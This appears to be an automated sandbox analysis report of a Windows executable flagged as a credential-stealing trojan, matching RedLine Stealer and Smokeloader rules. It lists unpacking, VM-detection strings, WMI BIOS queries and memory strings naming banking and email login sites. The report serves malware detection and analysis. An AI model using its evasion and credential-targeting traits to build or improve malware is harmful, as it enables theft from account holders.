            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020FDE400_2_020FDE40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210CE630_2_0210CE63
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210DE670_2_0210DE67
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210FEDC0_2_0210FEDC
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211AEF70_2_0211AEF7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212EF070_2_0212EF07
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02106F350_2_02106F35
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020FCFAD0_2_020FCFAD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020FEC770_2_020FEC77
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211CCB00_2_0211CCB0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211DCBC0_2_0211DCBC
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211CD370_2_0211CD37
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211CD780_2_0211CD78
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02126D6F0_2_02126D6F
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211CD890_2_0211CD89
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: String function: 00408030 appears 42 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: String function: 00414400 appears 65 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: String function: 020F8297 appears 72 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: String function: 02104667 appears 65 times
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812
            Source: SPFFah2O2q.exe, 00000000.00000000.1422175290.000000000044F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesDefenca2 vs SPFFah2O2q.exe
            Source: SPFFah2O2q.exe, 00000000.00000003.1430533169.0000000000544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesDefenca2 vs SPFFah2O2q.exe
            Source: SPFFah2O2q.exeBinary or memory string: OriginalFilenamesDefenca2 vs SPFFah2O2q.exe
            Source: SPFFah2O2q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: SPFFah2O2q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@10/2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C07A6 CreateToolhelp32Snapshot,Module32First,0_2_020C07A6
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_00437DF0
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess768
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\36ec44c9-6b3d-455f-bf47-88a3e1d4df6fJump to behavior
            Source: SPFFah2O2q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SPFFah2O2q.exe, 00000000.00000003.1534922228.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1558853631.0000000002E7B000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1559913780.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534460127.0000000002E95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SPFFah2O2q.exeVirustotal: Detection: 41%
            Source: SPFFah2O2q.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile read: C:\Users\user\Desktop\SPFFah2O2q.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SPFFah2O2q.exe "C:\Users\user\Desktop\SPFFah2O2q.exe"
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeUnpacked PE file: 0.2.SPFFah2O2q.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeUnpacked PE file: 0.2.SPFFah2O2q.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0043D812
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00443469 push ebp; iretd 0_2_0044346C
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0044366E push 9F00CD97h; ret 0_2_004436B1
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0043AE3E
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004477A5 push ebp; iretd 0_2_004477AA
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C582A push ss; retf 0_2_020C589B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C58AD push ss; retf 0_2_020C589B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C3480 push ebp; ret 0_2_020C3483
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C14DC push 00000039h; ret 0_2_020C15B3
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C1545 push 00000039h; ret 0_2_020C15B3
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C156B push 00000039h; ret 0_2_020C15B3
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212B097 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0212B0A5
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212DA77 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0212DA79
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02113A79 push esp; iretd 0_2_02113A7C
            Source: SPFFah2O2q.exeStatic PE information: section name: .text entropy: 7.746542950910192
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe TID: 1612Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1720458759.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeAPI call chain: ExitProcess graph end nodegraph_0-26046
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043C1F0 LdrInitializeThunk,0_2_0043C1F0
